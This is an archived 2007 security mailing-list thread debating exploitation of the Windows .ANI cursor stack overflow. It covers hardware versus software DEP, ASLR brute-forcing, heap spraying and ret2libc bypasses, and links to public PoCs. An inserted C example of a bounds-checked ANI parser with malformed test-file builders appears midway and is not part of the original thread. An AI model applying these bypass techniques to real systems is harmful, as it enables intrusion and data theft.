MM> Your claim is just pointless. You CAN write
MM> reliable exploit for Hardware NX DEP and you CAN take over whole system
MM> even in the IE Protected mode

Oh dear, my "claim is just pointless", the fact is, I have not made
such a claim, I have introduced the notion of Hardware DEP and Software
DEP, that's what I did and that's all. Some people don't realise there
is a difference between them; I wanted to show them there is.

In other words, claiming it works with "DEP enabled" just because the
PoC worked on your software-DEP-enabled machine doesn't prove it works
on HW-enabled machines, that was my point. That's my entire point, not
saying it can't be or isn't being done with Hardware DEP... get it?

I never claimed it can't be done, actually within our company some do, so..
Try the current milw0rm PoCs on NX-enforced CPUs

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Thierry Zoller
Dear Larry,

You are a stubborn guy, aren't you? _Again_, I am not talking Software DEP
but Hardware-enforced DEP. Read: 2 different things.

This is my last email in this regard, I see no point in trying to
give you further information that might help you estimate risk, as you
seem resistant to help or pointers beyond your comprehension or
current belief.

You reference the correct page but then completely miss the point,
please read the page entirely. Your pasted information related to
software DEP not Hardware enforced DEP (which is NX bit)

Quote (wiki) :
If the x86 processor supports this feature in hardware, then the NX features
are turned on automatically in Windows XP/Server 2003 by default. If the
feature is not supported by the x86 processor, then no protection is given.

"Software DEP" is unrelated to the NX bit, and is what Microsoft calls
their enforcement of Safe Structured Exception Handling. Software DEP/SafeSEH
simply checks when an exception is thrown to make sure that the exception is
registered in a function table for the application, and requires the program
to be built with it. This is likely a countermeasure to handle an exploit
possible because of the way DEP handles NX faults; while most other
technologies simply terminate the program unquestioningly, DEP raises
an exception. It is not possible for a program to truly recover from
an attack because program flow is destroyed in an unrecoverable manner.


On the very same MS page you reference:

Hardware-enforced DEP
Hardware-enforced DEP marks all memory locations in a process as non-executable 
unless the location explicitly contains executable code.
A class of attacks exists that tries to insert and run code from non-executable 
memory locations. DEP helps prevent these attacks by
intercepting them and raising an exception.

Hardware-enforced DEP relies on processor hardware to mark memory with an 
attribute that indicates that code should not be executed
from that memory. DEP functions on a per-virtual memory page basis, and DEP 
typically changes a bit in the page table entry (PTE)
to mark the memory page.

Processor architecture determines how DEP is implemented in hardware and how 
DEP marks the virtual memory page. However,
processors that support hardware-enforced DEP can raise an exception when code 
is executed from a page that is marked with
the appropriate attribute set.

Advanced Micro Devices (AMD) and Intel have defined and shipped 
Windows-compatible architectures that are compatible with DEP.

Beginning with Windows XP SP2, the 32-bit version of Windows uses one of the 
following:
•   The no-execute page-protection (NX) processor feature as defined by AMD.
•   The Execute Disable Bit (XD) feature as defined by Intel.


List of CPUs with NX bit (courtesy of Wikipedia)
* AMD Athlon 64
* AMD Athlon 64 X2
* AMD Athlon 64 FX
* AMD Opteron
* AMD Sempron (from Paris on)
* AMD Turion 64
* AMD Turion 64 X2
* Intel Celeron D
* Intel Celeron M (from the Dothan core on)
* Intel Core Duo
* Intel Core Solo
* Intel Core 2 Duo
* Intel Core 2 Extreme
* Intel Pentium 4 (from Prescott F/J type on)
* Intel Pentium D
* Intel Pentium Extreme Edition
* Intel Pentium M (from Dothan on, newer models)
* Transmeta Efficeon
* VIA C7

That said, Michal Majchrowicz pointed out return-to-libc style still
works with DEP enabled, yes, but what about ASLR activated in Vista?

Anyways, George already tested it, can somebody else confirm whether
this is an issue or non-issue on Vista with NX capable CPUs?


-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Larry Seltzer
>>That's where you are wrong larry, if you have an NX capable CPU
("hardware enforced") DEP is turned on by default on all and every
process. Software DEP is not really DEP it's more like SafeSEH... 

See http://support.microsoft.com/default.aspx/kb/875352 ("A detailed
description of the Data Execution Prevention (DEP) feature in Windows XP
Service Pack 2...")

"OptIn - This setting is the default configuration. On systems with
processors that can implement hardware-enforced DEP, DEP is enabled by
default for limited system binaries and programs that "opt-in." With
this option, only Windows system binaries are covered by DEP by default.
"

I'm almost positive that the limited system binaries do not include
Internet Explorer. At the time they made this configuration decision too
many controls were broken by turning on DEP by default. 

And the policy is the same in Vista. For now.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Thierry Zoller
Dear Larry Seltzer,

I did not ask to have an explanation about Heap based exploits.

LS>I'm sure any HIPS would block it. But like DEP they're not on
LS> in Windows by default.
That's where you are wrong larry, if you have an NX capable CPU
("hardware enforced") DEP is turned on by default on all and every
process. Software DEP is not really DEP it's more like SafeSEH...


-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Larry Seltzer
>>"Heap spraying" is filling the heap with controllable data... This is
>>simply allocating things in the heap. NOT running code.
>>You are trying to say that once you jump into that code via some
>>exploit (NOT part of the heap spraying technique itself) THEN you are
>>"running code in the heap". 

What's the point of spraying the heap if you're not going to jump into
it?
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/

 
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Jason Areff

On 4/2/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:

> LS>Heap spraying implies running code in the heap,
> JA>Actually, um.. no.. it doesn't
>
> My understanding of heap spraying comes from
> http://blogs.securiteam.com/index.php/archives/638: "...SkyLined's heap
> spraying technique
> (http://sf-freedom.blogspot.com/2006/07/heap-spraying-internet-exploiter
> .html) (the concept of this technique is that you inject the nop +
> shellcode into the heap memory and use some method to trick the eip jump
> into that heap ..."
>
> Sure sounds like running code in the heap to me.

"Heap spraying" is filling the heap with controllable data... This is simply
allocating things in the heap. NOT running code.

You are trying to say that once you jump into that code via some exploit
(NOT part of the heap spraying technique itself) THEN you are "running code
in the heap".

> JA>How do you get to be in that position? Lots of buzzword-tossing I'd
> have to guess.
>
> Fuck you too.
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Larry Seltzer
LS>Heap spraying implies running code in the heap, 
JA>Actually, um.. no.. it doesn't

My understanding of heap spraying comes from
http://blogs.securiteam.com/index.php/archives/638: "...SkyLined's heap
spraying technique
(http://sf-freedom.blogspot.com/2006/07/heap-spraying-internet-exploiter
.html) (the concept of this technique is that you inject the nop +
shellcode into the heap memory and use some method to trick the eip jump
into that heap ..."

Sure sounds like running code in the heap to me.
 
JA>How do you get to be in that position? Lots of buzzword-tossing I'd
have to guess.

Fuck you too.
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/

 
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Jason Areff

On 4/2/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:

> AS> A much simpler solution is to use heap spraying (which works fine on
> AS> Vista) for systems that don't have DEP enabled.
> TZ> Are we talking Software DEP or Hardware-enforced DEP ?
>
> Heap spraying implies running code in the heap,

Actually, um.. no.. it doesn't

> which any DEP should
> block. There are all kinds of software techniques that would detect heap
> spraying. I'm sure any HIPS would block it.

Most likely not with regard to Sotirov's new heap library stuff.

> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]

How do you get to be in that position? Lots of buzzword-tossing I'd have to
guess.

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Larry Seltzer
AS> A much simpler solution is to use heap spraying (which works fine on
AS> Vista) for systems that don't have DEP enabled.
TZ> Are we talking Software DEP or Hardware-enforced DEP ? 

Heap spraying implies running code in the heap, which any DEP should
block. There are all kinds of software techniques that would detect heap
spraying. I'm sure any HIPS would block it. But like DEP they're not on
in Windows by default.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Thierry Zoller
Dear Alexander Sotirov,

AS> A much simpler solution is to use heap spraying (which works fine on Vista) for
AS> systems that don't have DEP enabled.
Are we talking Software DEP or Hardware-enforced DEP ?


-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Alexander Sotirov
Larry Seltzer wrote:
> Perhaps your exploit proves this wrong, but it's the last I heard on the
> subject. And even if there are only 256 slots how do you try more than
> one? Isn't the first wrong one going to crash the browser?

Read our advisory:
http://www.determina.com/security.research/vulnerabilities/ani-header.html

It explains that the vulnerable code is wrapped in an exception handler that
recovers from access violations. That means that you can trigger the exploit
multiple times and try different addresses, increasing the chance of hitting the
right one (you only need 128 tries on average)

A much simpler solution is to use heap spraying (which works fine on Vista) for
systems that don't have DEP enabled.

> As for the exploits in protected mode I'm sure there are things you can
> do, but it's a huge step down from what you can do in XP and it's gone
> as soon as you exit IE7

Unless somebody has a Vista exploit for the CSRSS kernel bug :-) In general I
agree that protected mode presents additional constraints on exploitation, but I
would reserve judgment until we've seen a few more exploits and more public
research.

Alex

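Added illustration for the parsing bug this thread is about. It is not code from the thread, from the Determina advisory, from Microsoft, or from any of the posted PoCs: it is a minimal RIFF/ACON chunk walker in C that applies the length check a safe loader needs on the 'anih' chunk. The 36-byte ANIHEADER layout is the documented one; the chunk walker itself, the helper names (parse_ani, build_sample, check_case) and the sample files it builds are assumptions of this example. A loader that copies a file-supplied chunk length into a fixed 36-byte stack structure is the overflow class under discussion; this parser refuses any anih chunk that does not declare exactly 36 bytes, whether it is the first anih chunk in the file or a later one.

```c
/* Added example, not code from the thread, the advisory, Microsoft or any
 * posted PoC: an ACON chunk walker that bounds-checks every 'anih' chunk.
 * ANIHEADER is the documented 36-byte layout; sample files are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ANIHEADER_SIZE 36u  /* nine little-endian DWORDs */

typedef struct {
    uint32_t cbSizeof, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags;
} ANIHEADER;

enum ani_status { ANI_OK = 0, ANI_BAD_RIFF, ANI_TRUNCATED, ANI_BAD_ANIH, ANI_NO_ANIH };

static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static void wr32(uint8_t *p, uint32_t v) { p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24; }

/* Walk the top-level chunks of an ACON file.  Every 'anih' chunk, not only
 * the first, must declare exactly ANIHEADER_SIZE bytes before its body is
 * copied into the fixed-size structure.  Copying a file-supplied chunk length
 * into a 36-byte stack buffer without this check is the overflow pattern the
 * thread discusses; here an oversized chunk is rejected instead.
 * (LIST sub-chunks are not descended; a full loader also parses fram/icon.) */
enum ani_status parse_ani(const uint8_t *buf, size_t len, ANIHEADER *out)
{
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "ACON", 4) != 0)
        return ANI_BAD_RIFF;
    if ((size_t)rd32(buf + 4) + 8 > len)       /* RIFF length exceeds the data */
        return ANI_TRUNCATED;

    size_t pos = 12;
    int seen = 0;
    while (pos + 8 <= len) {
        const uint8_t *id = buf + pos;
        uint32_t clen = rd32(buf + pos + 4);
        pos += 8;
        if (clen > len - pos)                  /* chunk body runs past the file */
            return ANI_TRUNCATED;
        if (memcmp(id, "anih", 4) == 0) {
            if (clen != ANIHEADER_SIZE)        /* the missing bounds check */
                return ANI_BAD_ANIH;
            uint32_t v[9];
            for (int i = 0; i < 9; i++)
                v[i] = rd32(buf + pos + 4 * i);
            if (v[0] != ANIHEADER_SIZE)        /* cbSizeof must agree as well */
                return ANI_BAD_ANIH;
            memcpy(out, v, sizeof v);          /* nine uint32 fields, no padding */
            seen = 1;
        }
        pos += clen + (clen & 1);              /* chunk bodies are word-aligned */
    }
    return seen ? ANI_OK : ANI_NO_ANIH;
}

/* Append one RIFF chunk (id, length, body, pad byte) and return bytes written. */
static size_t put_chunk(uint8_t *dst, const char *id, const uint8_t *body, uint32_t n)
{
    memcpy(dst, id, 4);
    wr32(dst + 4, n);
    memcpy(dst + 8, body, n);
    if (n & 1) dst[8 + n] = 0;
    return 8 + n + (n & 1);
}

/* Build a constructed sample whose anih chunk declares anih_len bytes: 36
 * yields a well-formed two-frame header, anything else a chunk of 'A's that
 * a checked loader must refuse.  Returns the file size, or 0 if it cannot fit. */
size_t build_sample(uint8_t *dst, size_t cap, uint32_t anih_len)
{
    uint8_t payload[256];
    const uint8_t rate[8] = { 10, 0, 0, 0, 10, 0, 0, 0 };   /* per-step JIF rates */
    const uint32_t hdr[9] = { ANIHEADER_SIZE, 2, 2, 32, 32, 32, 1, 10, 1 };

    if (anih_len > sizeof payload || cap < 12 + 8 + anih_len + 1 + 16)
        return 0;
    memset(payload, 'A', sizeof payload);
    if (anih_len == ANIHEADER_SIZE)
        for (int i = 0; i < 9; i++)
            wr32(payload + 4 * i, hdr[i]);

    size_t pos = 12;
    pos += put_chunk(dst + pos, "anih", payload, anih_len);
    pos += put_chunk(dst + pos, "rate", rate, sizeof rate);
    memcpy(dst, "RIFF", 4);
    wr32(dst + 4, (uint32_t)(pos - 8));
    memcpy(dst + 8, "ACON", 4);
    return pos;
}

ANIHEADER last_hdr;   /* header parsed by the most recent check_case() call */

/* Build a sample, optionally drop `trim` trailing bytes, return the verdict. */
int check_case(uint32_t anih_len, size_t trim)
{
    uint8_t file[512];
    size_t n = build_sample(file, sizeof file, anih_len);
    if (n == 0 || trim >= n)
        return -1;
    return (int)parse_ani(file, n - trim, &last_hdr);
}
```

check_case(36, 0) returns ANI_OK and fills last_hdr; check_case(100, 0) and check_case(37, 0) return ANI_BAD_ANIH, and check_case(36, 10) returns ANI_TRUNCATED. The point to carry over to any chunked format: validate every chunk's declared length against both the remaining file size and the fixed-size destination, for every occurrence of the chunk, before copying a single byte.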


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow -> It's ok, it's in IE Protected Mode

2007-04-01 Thread Haroon Meer
Hi Larry..

Larry Seltzer wrote:
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode? You need to get the user to run the ANI outside
> of IE.

Assuming a compromised IE session is relatively harmless is pretty
dangerous. While low privileged browsing is a welcome idea it is
unfortunately (mostly) a solution to yesterday's problem.

In the past we used to worry about zillions of machines being
compromised and becoming zombies.
Today, we are realizing more and more that it's all about the data.

ex:
I run as mh on my machine. Everything of value on my machine is
accessible to me. My music, my videos, my documents, my email, etc.
Getting root/system on my machine gets you bragging rights, but if you
were serious about hurting me, then mh is the only account you really
need to compromise.

By default, IE uses a NoWriteUp policy. Meaning that a low IL mh shell
still gets to read everything of mh's by default (Check out Mark
Minasi's chml to convert this to a more secure NoReadUp :
http://www.minasi.com/vista/chml.htm)

A low integrity shell (as a result of an IE compromise) may not be able
to write files to most locations on my machine, and so prevents my
machine from being "owned" in the traditional sense, but won't stop me
from losing all of my data.

/mh

-- 
Haroon Meer, SensePost Information Security
PGP: http://www.sensepost.com/pgp/haroon.txt
Tel: +27 83786 6637



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread James Matthews

Windows security has always been pockmarked

On 4/1/07, George Ou <[EMAIL PROTECTED]> wrote:

> "[EMAIL PROTECTED] said:
> http://www.milw0rm.com/exploits/3634
>
> str0ke told me to test this one and no miracle, it works under vista and the
> default DEP settings doesn't catch it."
>
> Default DEP settings in Windows XP or Vista are worthless since it's off for
> all applications including IE7.  I tested with DEP always-on and it crashed
> IE7 and the exploit failed.
>
> Note that when you manually launch an HTML from your hard drive, Protected
> Mode is turned off because your HDD is considered a trusted source whereas
> the public Internet is not.  If I had tried to browse a webpage with this
> exploit, protected mode would have been turned on.  I also had to manually
> bypass the Active X warning to get the exploit to run and even then it
> crashed with my fully-on DEP settings with hardware-enforcement.
>
> I don't really feel like turning off my DEP settings on my Vista machine
> though I have a feeling that UAC would prevent it from rooting my system
> though it could probably damage my files if it were coded to do that.  But I
> had to go out of my way to get this exploit to run by manually downloading
> the zip and manually enabling the ActiveX control just to get it to crash my
> browser.
>
> So I think it's fair to say that hardware-enforced fully-enabled DEP will
> defeat the ANI exploit (in the current generic state) all by itself.
> Protected Mode would have also mitigated the ANI exploit to a low-risk state
> that is non-persistent as soon as IE is closed.
>
> So with protected mode turned off, DEP not fully enabled (or missing NX
> hardware), the ANI exploit would be able to compromise the local user
> profile and data but it would still need to get around UAC if it wants to
> put a backdoor in Vista.
>
> George

--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread George Ou
"[EMAIL PROTECTED] said:
http://www.milw0rm.com/exploits/3634

str0ke told me to test this one and no miracle, it works under vista and the
default DEP settings doesn't catch it."


Default DEP settings in Windows XP or Vista are worthless since it's off for
all applications including IE7.  I tested with DEP always-on and it crashed
IE7 and the exploit failed.

Note that when you manually launch an HTML from your hard drive, Protected
Mode is turned off because your HDD is considered a trusted source whereas
the public Internet is not.  If I had tried to browse a webpage with this
exploit, protected mode would have been turned on.  I also had to manually
bypass the Active X warning to get the exploit to run and even then it
crashed with my fully-on DEP settings with hardware-enforcement.

I don't really feel like turning off my DEP settings on my Vista machine
though I have a feeling that UAC would prevent it from rooting my system
though it could probably damage my files if it were coded to do that.  But I
had to go out of my way to get this exploit to run by manually downloading
the zip and manually enabling the ActiveX control just to get it to crash my
browser.

So I think it's fair to say that hardware-enforced fully-enabled DEP will
defeat the ANI exploit (in the current generic state) all by itself.
Protected Mode would have also mitigated the ANI exploit to a low-risk state
that is non-persistent as soon as IE is closed.

So with protected mode turned off, DEP not fully enabled (or missing NX
hardware), the ANI exploit would be able to compromise the local user
profile and data but it would still need to get around UAC if it wants to
put a backdoor in Vista.



George



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread [EMAIL PROTECTED]
http://www.milw0rm.com/exploits/3634

str0ke told me to test this one and no miracle, it works under vista and 
the default DEP settings doesn't catch it.


[EMAIL PROTECTED] wrote:
>  From the published poc yes vista is vulnerable , the poc doesn't 
> exploit it but shows enough..
> The whole windows browser crashes when you try to open the folder of the 
> malicious .ani file,
> can't even attach it to an email because thunderbird crashes when I'm 
> browsing to attach the .ani,
> EIP is overwritten by some wrong data near the shellcode. To sum up, 
> you don't have to open the file
> on vista, displaying it is enough, there is less user interaction 
> required to exploit that bug on vista than older windows os,
>
> surprising...   ...or not =)
>  
> Larry Seltzer wrote:
>   
>>> It is completely possible to execute shellcode if we can do some DEP
>>> bypass (ie. ret2libc attack, etc..)  
>>
>> In Vista this should have problems because of ASLR, right?
>>
>> I'm beginning to think that web-based attacks with this in Vista aren't
>> really so scary. Even if you can get them to execute what can you really
>> do in IE protected mode? You need to get the user to run the ANI outside
>> of IE. Can anyone say what actually happens if you read an e-mail in the
>> Vista Mail program with an attack ANI embedded?
>>
>> Larry Seltzer
>> eWEEK.com Security Center Editor
>> http://security.eweek.com/
>> http://blog.eweek.com/blogs/larry%5Fseltzer/
>> Contributing Editor, PC Magazine
>> [EMAIL PROTECTED] 
>>
>



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread [EMAIL PROTECTED]
From the published PoC, yes, Vista is vulnerable; the PoC doesn't 
exploit it but shows enough..
The whole Windows browser crashes when you try to open the folder of the 
malicious .ani file,
can't even attach it to an email because Thunderbird crashes when I'm 
browsing to attach the .ani,
EIP is overwritten by some wrong data near the shellcode. To resume, 
you don't have to open the file
on Vista, displaying it is enough, there is less user interaction 
required to exploit that bug on Vista than on older Windows OSes,

surprising...   ...or not =)
 
Larry Seltzer wrote:
>>> It is completely possible to execute shellcode if we can do some DEP
> bypass (ie. ret2libc attack, etc..)
>
> In Vista this should have problems because of ASLR, right?
>
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode? You need to get the user to run the ANI outside
> of IE. Can anyone say what actually happens if you read an e-mail in the
> Vista Mail program with an attack ANI embedded?
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED] 
>



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread Larry Seltzer
I'm not familiar with Solar Eclipse's claims. I thought the low-entropy
argument was impeached a while ago. See
http://blogs.msdn.com/michael_howard/archive/2006/10/04/Alleged-Bugs-in-Windows-Vista_1920_s-ASLR-Implementation.aspx
The author of the original paper arguing low entropy replies to the blog
conceding the point. There are two stages of randomization.

Perhaps your exploit proves this wrong, but it's the last I heard on the
subject. And even if there are only 256 slots how do you try more than
one? Isn't the first wrong one going to crash the browser?

As for the exploits in protected mode I'm sure there are things you can
do, but it's a huge step down from what you can do in XP and it's gone
as soon as you exit IE7

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

-Original Message-
From: Dave Aitel [mailto:[EMAIL PROTECTED] 
Sent: Sunday, April 01, 2007 3:42 PM
To: Larry Seltzer
Cc: dev code; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow


ASLR has limited entropy and the attacker can continue to try exploits
an infinite number of times (as Solar Eclipse points out). This means
you can write a reliable Vista exploit, theoretically. I'll probably
finish one up on Monday.

IE in protected mode would still allow you access to the local network
and, more importantly, anything IE does. You could, for example, inject
code into all viewed webpages that steals passwords and whatnot. Just at
the very minimum.

- -dave




Larry Seltzer wrote:
>>> It is completely possible to execute shellcode if we can do some DEP
> bypass (ie. ret2libc attack, etc..)
>
> In Vista this should have problems because of ASLR, right?
>
> I'm beginning to think that web-based attacks with this in Vista 
> aren't really so scary. Even if you can get them to execute what can 
> you really do in IE protected mode? You need to get the user to run 
> the ANI outside of IE. Can anyone say what actually happens if you 
> read an e-mail in the Vista Mail program with an attack ANI embedded?
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
>




Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread dev code
Just wanted to post that using a ret2libc attack works as shown in the video 
here:

http://www.zippyvideos.com/5991194746836606/ani-xp-sp2/


>From: "Chris Lyon" <[EMAIL PROTECTED]>
>To: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>Date: Sun, 1 Apr 2007 09:24:51 -0700
>
>On 4/1/07, wac <[EMAIL PROTECTED]> wrote:
>>
>>
>>
>>On 4/1/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:
>> >
>> > >>The issue is that this only works with DEP turned off!
>> >
>> > Interesting point. I haven't seen this mentioned anywhere, including 
>>the
>> > Microsoft advisory
>> > ( http://www.microsoft.com/technet/security/advisory/935423.mspx).
>> >
>> > Has anyone actually tested this with DEP on/off to be sure?
>>
>>
>Did you guys see this from the CISRT?
>
>http://www.cisrt.org/enblog/read.php?68
>
>
>>Yes, winhex uses the function when you open the .ani and I don't have it
>>running with DEP turned on and the same goes for firefox that also leaves
>>the file opened when I opened the web link dev sent me (already tested 
>>winhex
>>with the address of exitprocess that btw seems to float around from system
>>to system since the version dev sent me does not work for me and it works
>>like a charm when I built it). I was talking with dev code about DEP
>>bypassing btw, we think that is possible to exploit even with >> DEP ON 
>><<.
>>Just ideas for now.
>>
>>Larry Seltzer
>> > eWEEK.com Security Center Editor
>> > http://security.eweek.com/
>> > http://blog.eweek.com/blogs/larry_seltzer/
>> > Contributing Editor, PC Magazine
>> > [EMAIL PROTECTED]
>> >




Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread Larry Seltzer
>>It is completely possible to execute shellcode if we can do some DEP
bypass (ie. ret2libc attack, etc..)  

In Vista this should have problems because of ASLR, right?

I'm beginning to think that web-based attacks with this in Vista aren't
really so scary. Even if you can get them to execute what can you really
do in IE protected mode? You need to get the user to run the ANI outside
of IE. Can anyone say what actually happens if you read an e-mail in the
Vista Mail program with an attack ANI embedded?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread Larry Seltzer
>>I tested it in Windows xp sp2 and it doesn't work.
>>Callax

Did you try turning DEP off and re-testing?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread Goodfellas Research Security Team - Callax
Hi, 

I tested it in Windows XP SP2 and it doesn't work.

Greetings

Callax 
Shellcode Security Research Team.
Argentine

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Larry
Seltzer
Sent: Sunday, April 01, 2007 01:50 p.m.
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the
Microsoft advisory
(http://www.microsoft.com/technet/security/advisory/935423.mspx).
 
Has anyone actually tested this with DEP on/off to be sure?
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread Chris Lyon

On 4/1/07, wac <[EMAIL PROTECTED]> wrote:




On 4/1/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:
>
> >>The issue is that this only works with DEP turned off!
>
> Interesting point. I haven't seen this mentioned anywhere, including the
> Microsoft advisory
> ( http://www.microsoft.com/technet/security/advisory/935423.mspx).
>
> Has anyone actually tested this with DEP on/off to be sure?



Did you guys see this from the CISRT?

http://www.cisrt.org/enblog/read.php?68


Yes, winhex uses the function when you open the .ani and I don't have it
running with DEP turned on and the same goes for firefox that also leaves
the file opened when I opened the web link dev sent me (already tested winhex
with the address of exitprocess that btw seems to float around from system
to system since the version dev sent me does not work for me and it works
like a charm when I built it). I was talking with dev code about DEP
bypassing btw, we think that is possible to exploit even with >> DEP ON <<.
Just ideas for now.

Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry_seltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
>



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread wac

On 4/1/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:


>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the
Microsoft advisory
(http://www.microsoft.com/technet/security/advisory/935423.mspx).

Has anyone actually tested this with DEP on/off to be sure?



Yes, winhex uses the function when you open the .ani and I don't have it
running with DEP turned on and the same goes for firefox that also leaves
the file opened when I opened the web link dev sent me (already tested winhex
with the address of exitprocess that btw seems to float around from system
to system since the version dev sent me does not work for me and it works
like a charm when I built it). I was talking with dev code about DEP
bypassing btw, we think that is possible to exploit even with >> DEP ON <<.
Just ideas for now.

Larry Seltzer

eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread dev code
I made a mistake in including "jmp esp" for XP SP2 because the stack cannot 
be executed (due to DEP of course :P). It is completely possible to execute 
shellcode if we can do some DEP bypass (ie. ret2libc attack, etc..) to add 
execute access to the stack and jmp to our code. My PoC I updated yesterday 
(added as an attachment to the full disclosure post) returns to 
ExitProcess() and closes explorer.exe upon viewing the .ani file, just to 
show that it is possible to do our own shiznat in SP2.

>From: "Larry Seltzer" <[EMAIL PROTECTED]>
>To: 
>Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>Date: Sun, 1 Apr 2007 07:49:58 -0400
>
> >>The issue is that this only works with DEP turned off!
>
>Interesting point. I haven't seen this mentioned anywhere, including the
>Microsoft advisory
>(http://www.microsoft.com/technet/security/advisory/935423.mspx).
>
